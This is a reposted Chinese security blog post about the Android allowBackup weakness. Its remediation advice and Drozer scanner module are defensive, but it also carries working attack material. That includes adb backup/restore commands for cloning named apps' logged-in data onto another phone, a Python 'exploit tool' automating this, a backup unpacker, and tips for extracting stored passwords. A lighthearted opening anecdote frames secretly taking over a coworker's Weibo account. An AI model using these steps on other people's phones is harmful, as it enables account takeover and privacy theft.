详解Android App AllowBackup配置带来的风险

最新推荐文章于 2021-05-27 05:01:57 发布
最新推荐文章于 2021-05-27 05:01:57 发布
阅读量626 收藏
点赞数
分类专栏: adb 组件 系统层面内容
系统层面内容 同时被 3 个专栏收录
396 篇文章 14 订阅
订阅专栏
组件
243 篇文章 2 订阅
订阅专栏
adb
35 篇文章 1 订阅
订阅专栏

前言

笔者在使用自己编写的 Drozer 模块对国内流行的安卓手机应用进行自动化扫描后发现有大量涉及用户财产和隐私的流行安卓应用存在 Android AllowBackup 漏洞,已测试成功受到漏洞影响的应用包括:新浪微博,百度云网盘,美团,大众点评,去哪儿等等。


漏洞案例

先来看一个情景案例,某IT男一直暗恋部门某女神,一天女神手机太卡了找IT男帮助清理手机空间,IT 男高兴地答应女神两分钟搞定,屁颠屁颠的跑到自己电脑旁边连上手机,女神在一边呆呆的看着IT男敲了几行代码然后在手机上点了几下,最后果然两分钟不到就搞定了,在女神谢着离开后,IT男露出了 WS 的笑容。

没错,他成功了盗到了女神的微博帐号,终于不用问同事女神的微博帐号是多少了~当然这不是结局,一天晚上睡觉时,他看了女神的微博私信后心突然碎了。到底发生了什么,这背后有啥不可告人的秘密?且看本文详细分析。

漏洞背景

在谷歌 2010 年发布 Android 2.2 Froyo  (冻酸奶)系统中,谷歌引入一个了系统备份的功能,允许用户备份系统应用和第三方应用的apk安装包和应用数据,以便在刷机或者数据丢失后恢复应用。 第三方应用开发者需要在应用的 AndroidManifest.xml 文件中配置 allowBackup 标志(默认为 true )来设置应用数据是否能能够被备份或恢复。当这个标志被设置为true时应用程序数据可以在手机未获取 ROOT 的情况下通过adb调试工具来备份和恢复,这就允许恶意攻击者在接触用户手机的情况下在短时间内启动手机 USB 调试功能来窃取那些能够受到 AllowBackup 漏洞影响的应用的数据,造成用户隐私泄露甚至财产损失。

使用反编绎工具 JEB 查看 weibo 客户端 manifest 配置:

 jebmanifest

在之前的案例正是因为新浪微博安卓客户端(最新版) AndroidManifest.xml 并没有配置:

1
android:allowBackup=“false”

导致女神手机中的微博客户端数据可以在短时间内通过 ADB 调试备份到电脑中最后恢复到IT男手机,然后IT男以后每天就可以用女神的帐号看女神发了啥微博和私信内容。当然可利用的场景当然不止于此,想想,如果存在漏洞的是你的团购应用呢(看看有啥团购券我先来用吧),当然还有你的网盘应用(说不定可以看女神的私密照~),哦,对了连社交和理财应用也不能放过(女神们还敢把手机给 IT 男清理不)。

 

检测方法

1)手工检测

测试环境:

  1. Windows 7,ADB 调试工具
  2. 物理接触目标手机1,连接手机1到 PC 端
  3. 手机1和手机2均未被 ROOT,开启 USB 调试
  4. 不用安装其它应用,不启动被测试的应用

测试流程:

  1. 连接安装开启USB调试手机1 到PC端
  2. 在PC自动(也可以提前)安装好手机驱动后
  3.    启动命令行界面输入以下命令:
1
2
3
4
5
adb devices
#显示已连接的设备列表,测试手机是否正常连接
adb backup -nosystem -noshared -apk -f com.sina.weibo.ab com.sina.weibo
#-nosystem表示不备份系统应用 -noshared表示不备份应用存储在SD中的数据 -apk表示备份应用APK安装
包 -f 表示备份的.ab文件路径和文件名 最后是要备份应用的packageName
  1. 点击手机1确认备份界面的“备份我的数据”
  2. 等待备份完成,至此微博客户端数据成功备份为 com.sina.weibo.ab 文件
  3. 断开手机1的连接,可以把手机还给女神啦
  4. 连接手机2 ,在命令行界面下输入以下命令:
1
2
3
adb kill-server  #关闭ADB
adb devices #重新启动ADB,检测手机2是否成功连接
adb restore com.sina.weibo.ab
  1. 点击手机2确认恢复界面的“恢复我的数据”
  2. 等待恢复完成
  3. 打开手机2中新安装的微博客户端,测试可正常登录手机1中帐号执行各种操作,且长期有效。

2)在线检测

目前国内三个主要的Android应用漏洞在线检测系统均能较好的检测此漏洞,建议普通用户和开发者使用腾讯金刚审计系统上传应用安装包进行检测。

 

1.腾讯金刚审计系统检测结果( http://service.security.tencent.com/kingkong )


2.阿里聚安全检测结果( http://jaq.alibaba.com/ )



3.360捉虫猎手检测结果( http://appscan.360.cn/ )


影响范围

目前测试了手上一台安装有Android 4.1.1系统的魅族MX2手机和安装有Android 4.4.2系统的魅族MX4手机均测试成功,理论上影响Android 2.2-Android 4.4系统中存在风险的应用。

建议评级:
尽管此漏洞的利用条件较高,需要物理接触,但此漏洞对涉及用户财产与隐私类的APP来说杀伤力较大,建议厂商视情况修复。

  1. 金融类APP 高危
  2. 支付类APP 高危
  3. 团购类APP 中危
  4. 社交类APP 中危
  5. 网盘类APP 中危
  6. 其它类APP 低危/无影响

修复方案

开发者如要避免应用数据泄露的风险,应当在设置 AndroidManifest.xml 文件中配置 android:allowBackup=“false”,此时应用程序数据无法被备份和恢复。或者在应用启动时检测手机硬件和网络环境是否改变,如果存在异常则强制退出或重新登录。

编写Drozer模块实现漏洞自动化扫描

Drozer是MWR InfoSecurity公司开发的一款安卓应用安全评估框架,其社区版开源在Github上(https://github.com/mwrlabs/drozer )。对于从事安卓应用漏洞测试的安全研究者们来说,他们可以使用drozer提供的框架自己编写模块(Module)方便对的安卓应用进行漏洞检测与利用。

以下是自己编写一个Drozer Module,用于自动化批量检测手机中的哪些应用存在AllowBackup风险。

import re
from drozer import android
from drozer.modules import common, Module
 
class AbChecker(Module, common.Assets,common.PackageManager):
 
    name = "check if app can be backup and restore by usb debugging"
    description = "see:htttp://www.droidsec.cn"
    examples ="""
    dz> run scanner.misc.abchecker -a
    -> it will run the script to check all apps
    dz> run scanner.misc.abchecker -p com.android.chrome 
    -> it will run the script to check the provided package
    """
    author = "DroidSec.cn"
    date = "2015-03-07"
    license = "BSD (3-clause)"
    path = ["scanner", "misc"]
    permissions = ["com.mwr.dz.permissions.GET_CONTEXT"]
 
    VULNERABLE_API = 'android:allowBackup="true"'
     
 
    def add_arguments(self, parser):
        parser.add_argument("-p", dest="pkg",help="the identifier of the package")
        parser.add_argument("-a", action="store_true",dest="all",help="the identifier of the package")
 
    def execute(self, arguments):
        if arguments.pkg != None:
            #self.stdout.write(arguments.pkg)
            self.__write_manifest(arguments.pkg)
        elif arguments.all == True:
            self.stdout.write("[color yellow] Start scan[/color]"+"\n")
            for package in self.packageManager().getPackages(common.PackageManager.GET_PERMISSIONS):
                try:
                    self.__write_manifest(package.packageName)
                except Exception, e:
                    print str(e)
            self.stdout.write("[color yellow] Scan finish[/color]"+"\n")
            
     
    def __write_manifest(self, package):
        lines=self.getAndroidManifest(package).split("\n")
        r1=re.compile(r'\<application')
        r2=re.compile(r'allowBackup="false"')
        vulnerable=0
        for line in lines:
            line = str(line)
            isApplicationTag=re.search(r1,line)
            if isApplicationTag != None:
                isAllowBackup=re.search(r2,line)
                    #self.stdout.write(line+"\n")
                if isAllowBackup == None:
                    self.stdout.write("[color red] %s is vulnerable[/color]"%package+"\n")
                else:
                        continue
            else:
                continue

 

运行截图:



注意事项:
此drozer module检测原理是匹配应用manifest文件中是否配置了allowBackup=“false”来判断应用数据是否可备份和恢复,实际测试会发现一部分应用能成功备份和恢复但就是无法登录(比如手机淘宝和京东客户端),这说明厂商已经考虑到此设置可能带来的安全风险,并做出了相应限制,此类应用是安全的。

 

编写脚本实现自动攻击和利用

如上文所述,整个漏洞测试过程中需要输入不少命令,对于手速慢和不习惯敲命令的人来说还是略麻烦了点,所以我们可以编写Python脚本来实现自动化攻击和利用。

#!/usr/bin/python 
#coding:utf8 
 
import commands
import re,sys
from optparse import OptionParser
 
def usage():
    print '''
    ------------------------------------------------------------------
                Android Application AllowBackup Exploit Tool
 
    Usage:DroidSec_AbHack.py -p com.xxx.xxx(packageName) -b (backup) 
          DroidSec_AbHack.py -p com.xxx.xxx(packageName) -r (restore)
 
    How to check the  security vulnerabilities of application?
    Go to the professional Android security Website!
                    =>  http://www.droidsec.cn  
    ------------------------------------------------------------------
    '''
 
class AbHack:
    def __init__(self,adb,pkg):
        self.adbdir=adb
        self.package=pkg
 
    def getinfo(self):
        (status,output)=commands.getstatusoutput(self.adbdir+'devices')
        r=re.findall('device',output)
        if len(r) >= 2:
            return "ok"
        else:
            return "waiting"
 
    def backup(self):
        if self.getinfo()=="ok":
            print "Start backup......"
            output=commands.getoutput(str(self.adbdir)+"backup -nosystem -noshared -apk 
-f "+str(self.package)+".ab "+str(self.package))
            print output
            print "backup success!"
        else:
            print "Please connect your mobile phone(usb debugging must been enabled) or
check the ADB directory is configurd properly"
 
    def restore(self):
        commands.getstatusoutput(self.adbdir+"kill-server")  
        if self.getinfo()=="ok":
            print "start restore..."
            output=commands.getoutput(str(self.adbdir)+"restore "+str(self.package)+".ab")
            print output
        else:
            print "Please connect your mobile phone(usb debugging must been enabled) or check 
the ADB directory is configured properly"
 
if __name__ == "__main__": 
    adbdir="/Users/nickycc/Downloads/adt-bundle-mac/sdk/platform-tools/adb "
 #please set the ADB file directory before use
    parser = OptionParser() 
    parser.add_option("-p", action="store", dest="pkg") 
    parser.add_option("-b", action="store_true",dest="abhack")
    parser.add_option("-r", action="store_false",dest="abhack")
    (options, args) = parser.parse_args() 
    usage()
    if len(sys.argv) <=1:
        sys.exit()
    elif options.abhack==True:
        Backup=AbHack(adbdir,options.pkg)
        Backup.backup()
    elif options.abhack==False:
        Restore=AbHack(adbdir,options.pkg)
        Restore.restore()
    else:
        sys.exit()

 

运行截图:



应用备份生成的.ab文件其实是可以解包的,解包后的目录结构如下:


分别对应了androidmanifest.xml,apk安装包,database目录,files目录,其它目录以及shared_prefs目录,我们可以通过解包来对窃取的应用数据进一步分析。
解包的python脚本如下:

# coding=utf-8
 
import argparse
import os
import sys
import zlib
 
 
C_BUFFER_SIZE = 1048576
 
 
def ArgParse():
    """
    Parses the command line arguments
 
    :return: argparse dictionary
    """
    # parse command line arguments
    parser = argparse.ArgumentParser(
        description="xbackup: extracts an Android ICS+ backup file.")
    parser.add_argument("ipath",
                        help="Input path.")
    parser.add_argument("opath",
                        help="output path.")
    args = parser.parse_args()
    return args
 
 
def Extract(args):
    """
    Extracts the .tar file of an Android Backup. Assumes the backup is not encrypted and is
    compressed.
 
    :param args:
    :return:
    """
    ifile = open(args.ipath, "rb")
    ofile = open(args.opath, "wb")
    data = ifile.read(C_BUFFER_SIZE)
    print data
    pos = data.find("none\n") + 5
    data = data[pos:]
    dc = zlib.decompressobj()
    while data:
        ofile.write(dc.decompress(data))
        data = ifile.read(C_BUFFER_SIZE)
    ifile.close()
    ofile.close()
 
 
def main():
    args = ArgParse()
    if os.path.isfile(args.ipath):
        Extract(args)
    else:
        print "Could not open input file!."
        return 1
    return 0
 
if __name__ == "__main__":
    sys.exit(main())

 

更多猥琐利用方法

国外安全公司PALO ALTO早在2014年8月就发过研究报告称超过94%的流行应用存在此漏洞, 大牛Claud Xiao更是在去年Hitcon会议分享过与此有关的研究,如何让这个被很多人厂商视如鸡肋的漏洞有为猥琐的利用呢?这里提两点自己想到的,欢迎大家一起来交流 : )
1)在APP漏洞里不安全的内部存储绝对是十分常见的漏洞,比如密码明文储存。笔者曾在测试某金融类APP时发现该APP在应用内部(/data/data/com.xx.xx/shared_prefs/)存储了明文的手势密码(如下图中的lock.xml),正常情况下如果用户手机是未ROOT的,就算明文存储也没法获取到,漏洞影响相对较小,而继而我发现该理财APP同时存在allowbackup漏洞,也就是说我可以先将该应用数据备份到另一台已经获取ROOT手机,然后我不仅获得了用户帐号登录权限,连手势密码我都可以直接修改成任意(服务器端没做验证)或者相同(服务器端有验证)。还有一种情况是应用数据库中(/data/data/com.xx.xx/database/)直接存储了用户的登录帐号和密码那相当于直接利用allowbackup盗得了用户帐户密码。


 

2)LastPass(一个用户密码管理工具)曾经被发现存在通过备份到其它手机来清除手势密码来登录获取用户储存在LastPass上的所有密码的漏洞(CVE-2013-5113 and CVE-2013-5114)。发散一下思维,储存用户其它密码的还有哪些应用?对!浏览器,那些习惯了记住密码的用户很可能就会被存在漏洞的浏览器卖了。其它就看大家的更猥琐的发挥了~

 

参考资料:

  1. https://www.paloaltonetworks.de/content/paloaltonetworks-com/global/cn_zh/index/company/press/2014/palo-alto-networks-unveils-security-risks-in-android-internal-storage.html
  2. http://researchcenter.paloaltonetworks.com/2014/08/insecure-internal-storage-android/
  3. http://developer.android.com/reference/android/R.attr.html#allowBackup
  4. http://blog.c22.cc/2013/08/01/bsideslv-android-backup-unpacker-release/
  5. http://nelenkov.blogspot.fi/2012/06/unpacking-android-backups.html
  6. https://github.com/info-lab/ABX
  7. https://github.com/mwrlabs/drozer
附件: codes.zip
【原文: 详解android-app-allowbackup配置带来的风险 作者Nicky  SP胖编整理发布】


转自:https://www.secpulse.com/archives/5228.html



锐湃
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详解Android app自动更新总结(已适配9.0)
08-26
主要介绍了详解Android app自动更新总结(已适配9.0),文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
android:allowbackup="false",android:allowBackup="false" 导致无法打包解决方案
weixin_30326905的博客
05-27 755
近日测试的小美眉开始对Apk做安全测试,测出有个安全隐患问题,问题如下图image.png对于allowBackup属性的解释如下android:allowBackup是否允许应用参与备份和恢复基础架构。如果将此属性设为 false,则永远不会为该应用执行备份或恢复,即使是采用全系统备份方法也不例外(这种备份方法通常会通过 adb 保存所有应用数据)。此属性的默认值为 true。详细请看https...
android:allowbackup="true"
qq_20252351的博客
03-31 2832
<application android:allowBackup="false" android:label="@string/app_name"> <activity android:name="LoginActivity" android:label="@string/app_name">
Android 安全 —— allowbackup 引起的漏洞
Star丶Xing
03-04 919
概述 在 API 8 以上,Android 提供了应用数据备份和恢复的功能。在 AndroidManifest.xml 的 allowbackup 可以声明App是否允许被备份。 当 allowBackup 为 true 时,App 可以被备份,可以通过 adb backup 和 adb restore 来备份和恢复应用。 &amp;lt;application android:all...
各个安卓漏洞检测框架是怎么检测allowBackup的?
lsj1342的博客
12-18 469
AndroBugs_Framework是怎么检测? 方法:直接获取AndroidManifest文件中allowBackup的属性,是否为true。(若没有,安卓系统是默认为true的) def is_adb_backup_enabled(self): """ Return true if the APK can be backed up ...
详解Android使用Gradle统一配置依赖管理
08-28
本篇文章主要介绍了详解Android 使用 Gradle 统一配置依赖管理,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
使用Chrome浏览器调试Android App详解
09-03
主要介绍了使用Chrome浏览器调试Android App详解,本网讲解了使用Facebook开源Stetho实现在Chrome中调试Android App中,需要的朋友可以参考下
android app进行代码混淆实例详解
01-04
1、打开混淆器:找到项目根目录下的project.properties文件,将“#proguard.config=${sdk.dir}/tools/proguard/proguard-android.txt:proguard-project.txt”这行前的“#”删除即可; 2、修改混淆配置文件:找到项目...
Android App 与 U 盘通信示例详解
08-28
本篇文章主要介绍了Android App 与 U 盘通信详解,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
AndroidManifest设置android:allowBackup=false报错
cxu123321的博客
06-02 2235
AndroidManifest设置android:allowBackup="false"报错 概述 设置android:allowBackup="false"的必要性 Android API Level 8及其以上Android系统提供了为应用程序数据的备份和恢复功能,此功能的开关决定于该应用程序中AndroidManifest.xml文件中的allowBackup属性值[1] ,其属性值默认是true。当allowBackup标志为true时,用户即可通过adb backup和adb restore
Android清单文件android:allowBackup=”false”的使用
OONullPointerAlex的博客
01-20 6165
AndroidManifest.xml文件的allowBackup属性值的讲解 一、alloBackup的作用 Android API Level 8开始提供了为应用程序备份和恢复数据的功能,此功能的开关可以通过应用程序中AndroidManifest.xml文件的allowBackup属性值进行配置,默认是True,所以用户可以对我们应用程序进行数据备份。 其实allowB
android:allowBackup="false"的时候生成apk失败
hrx-@@
02-24 1737
最近有个同事在查一些项目的安全漏洞问题,然后就查到我的app上了。 其中就提到了关于android:allowBackup这个属性设置为true的问题。 位置: AndroidManifest.xml &lt;application ... android:allowBackup="true" &gt; &lt;/application&gt...
Android allowBackup 设为false 报错
王丽君同学的专栏
12-28 1803
AndroidAndroidMainfest.xml中设置android:allowBackup="false"然后编译的时候报错如下Error:Execution failed for task ':app:processDebugManifest'.解决方法在AndroidManifest.xml中添加如下代码:tools:replace="android:allowBackup"整体如下所
allowBackup引发的问题
black_bird_cn的博客
06-15 3436
AndroidStuduio项目报错 今天AndroidStudio项目中引入一个AAR后一直报错: Manifest merger failed : Attribute application@allowBackup value=(false) from AndroidManifest.xml:9:9-36 is also present at [com.XXXXXXX]...
android allowBackup设置为false引起编译异常处理
可乐的博客
03-13 2491
关于AndroidManifest.xml中的allowBackup属性,也算是自己之前对这个属性的不了解,加上是自动生成代码,没太注意这个属性,但是这个属性会直接导致隐私数据的丢失具体危害可看这篇文章。在发布产品时需要将它设置为false为妥。但是今天设置为false时发现项目编译不了,提示错误:任务':app:transformClassesWithDexForDebug'的执行失败。。。。。...
android:allowbackup="false",设置android:allowBackup="false"编译报错
weixin_33941707的博客
05-27 251
在用AndroidStudio编译时报如下错误:java.lang.RuntimeException: Manifest merger failed with multiple errors, see logsat com.android.builder.core.AndroidBuilder.mergeManifestsForApplication(AndroidBuilder.java:540...
android:allowBackup = false后编译报错
皮小智的博客
12-07 4699
android:allowBackup = false后编译报错(已解决) 在application节点下加入 tools:replace="android:allowBackup"
android studio开发火车购票app购票代码详解
最新发布
05-31
因此,在这里我只能给你提供一个简单的购票代码示例,帮助你了解一下如何在Android Studio中编写购票代码。 以下是一个简单的购票代码示例: 1. 首先,在XML布局文件中,你需要设计一个购票界面,包括购票日期、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值